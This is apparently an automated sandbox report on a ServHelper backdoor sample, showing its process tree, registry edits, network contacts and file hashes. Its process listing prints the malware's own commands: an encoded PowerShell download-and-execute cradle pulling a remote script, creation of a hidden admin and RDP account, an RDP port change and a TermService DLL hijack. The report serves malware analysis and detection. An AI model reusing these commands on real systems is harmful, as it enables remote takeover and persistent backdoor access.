Malware Analysis Report

2024-10-19 04:37

Sample ID 210923-m5wg8ahecq
Target f71c575754e1f5890ad8b35afd08b8be.exe
SHA256 046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
Tags
servhelper backdoor discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211

Threat Level: Known bad

The file f71c575754e1f5890ad8b35afd08b8be.exe was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Possible privilege escalation attempt

Blocklisted process makes network request

UPX packed file

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-23 11:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-23 11:03

Reported

2021-09-23 11:06

Platform

win7-en-20210920

Max time kernel

128s

Max time network

100s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BCGXO9EBTRA5QBWLY0QJ.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0fa21ba6ab0d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1544 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 576 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 576 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1496 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1496 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1496 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 576 wrote to memory of 1216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 1848 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 576 wrote to memory of 640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 576 wrote to memory of 640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 576 wrote to memory of 640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 576 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1280 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 576 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1564 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1204 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 576 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 576 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 576 wrote to memory of 1868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1868 wrote to memory of 1932 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1868 wrote to memory of 1932 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1868 wrote to memory of 1932 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 576 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 576 wrote to memory of 1084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1084 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 472 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe

"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iyr5cs6d.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC2D1.tmp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc QNv2lMZc /add

C:\Windows\system32\net.exe

net.exe user wgautilacc QNv2lMZc /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc QNv2lMZc /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JZCKHXIN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc QNv2lMZc

C:\Windows\system32\net.exe

net.exe user wgautilacc QNv2lMZc

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc QNv2lMZc

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 2no.co udp
DE 88.99.66.31:443 2no.co tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 asfuuvhv3083f.xyz udp

Files

memory/1544-53-0x0000000041660000-0x0000000041A80000-memory.dmp

memory/1544-56-0x00000000411C4000-0x00000000411C6000-memory.dmp

memory/1544-55-0x00000000411C2000-0x00000000411C4000-memory.dmp

memory/1544-57-0x00000000411C6000-0x00000000411C7000-memory.dmp

memory/1544-58-0x00000000411C7000-0x00000000411C8000-memory.dmp

memory/576-59-0x0000000000000000-mapping.dmp

memory/576-60-0x000007FEFBA11000-0x000007FEFBA13000-memory.dmp

memory/576-62-0x00000000024F0000-0x00000000024F2000-memory.dmp

memory/576-63-0x00000000024F2000-0x00000000024F4000-memory.dmp

memory/576-64-0x00000000024F4000-0x00000000024F7000-memory.dmp

memory/576-61-0x000007FEEA7D0000-0x000007FEEB32D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/1496-66-0x0000000000000000-mapping.dmp

memory/576-67-0x00000000024FB000-0x000000000251A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\iyr5cs6d.cmdline

MD5 fc7c4018ee0c16651c3dc0ee939769f8
SHA1 a97cacf89e7bac1235de059328cea596aee2041d
SHA256 2e7d2a11d41ebeff1180f5a3f4c949b906a20c15d40fc0d502b5dedbed099674
SHA512 9a1b24b2c8c6684e0c31eb36fad5b0b023ec709878fddcb7a0164c6446293014c37b38200c6fa3f486b71128acdbb7c8b65d6ec298fbcb0e2c9e3fc68293b9b1

\??\c:\Users\Admin\AppData\Local\Temp\iyr5cs6d.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1236-70-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCC2D1.tmp

MD5 d938e995f9752ab7917847f614587aa7
SHA1 2e7aa2ba5326ccd393252b317b86f297ed4766aa
SHA256 7841407a353ef12953d6fed7323f9a7a0f2490014f943952e064af4b03c0bce9
SHA512 02f2da2ec601277708bf60a0dc5e361589a1ea8f35f9d1c86c3b74219723838b42ba32ce757a46fc32e34aadbce1155fb8e626ed04d04a11978340dab695e061

C:\Users\Admin\AppData\Local\Temp\RESC2D2.tmp

MD5 b44299068ff8228889477b26969eb7d4
SHA1 06402bd0ac80f7a1d1690f67e4e9abe7a11372f0
SHA256 585e61b9f9c3972c065c48ac2d6edb09c196cef0861cea0516bfea119bd14d77
SHA512 3f6b1160c947317d16e497dac55aa0c6f5b5389e86e4588bf39279ce95ba9873bd1bcda8d57c228e837b328b09f9a4b70528753dbb7873618ba3c9c4ca80be29

C:\Users\Admin\AppData\Local\Temp\iyr5cs6d.dll

MD5 2918d10e3b013adb230bc11952e80ae5
SHA1 22b5626b26173cdc565b02544f288d60783b04b5
SHA256 1cb2bed3abf72903adfeb867b45104a8383a488e5692eefd2679f033cfeaa7a8
SHA512 c96e4c23e289efee569cb117520f1eff9fe10d212cf1030a58118347d2fb23237d3c0d3355e3b864ed8592c5feded494118bde0b988dbd97131c673150568c62

C:\Users\Admin\AppData\Local\Temp\iyr5cs6d.pdb

MD5 fe6d9579831d236f6cb6b357f6f486e3
SHA1 539ec4eff85fbab75bfe53e781902df955009810
SHA256 78d015191c8066a5381332e2da9d06c4f3a7958ceef2b91a8630f53a6592fddf
SHA512 f56ea084de81998ee04bffac70ea918a72d28064fed70d9d261a66662517d8768b30db2d53a19e884388d0e022f066cf6b72361a16c2730379e2ca5746c6df68

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 78fc438bc0a10f68012273374fc242de
SHA1 1c2f8f958b4cfb2d822a50f97c1b503d039108d4
SHA256 14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0
SHA512 97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e

memory/576-77-0x000000000251D000-0x000000000251E000-memory.dmp

memory/1496-76-0x0000000002290000-0x0000000002292000-memory.dmp

memory/1216-78-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 73d5f129d48545e17502109d3691aa24
SHA1 11bf4b4216bc3991fd555269bd468ed6926e5252
SHA256 713002baba1a677b7215f5a9496dccc4d766b4e5cfc52df84587e4b84729d026
SHA512 6e14ad082e93677c59bdcfaa80d77ac296ed7063a72aa23440c1712f24c202d02f80dfd9a5cc7979708a9306ed397247f25da782bc047920e621b9197ed45206

memory/1216-82-0x0000000002030000-0x0000000002032000-memory.dmp

memory/1216-81-0x000007FEEA7D0000-0x000007FEEB32D000-memory.dmp

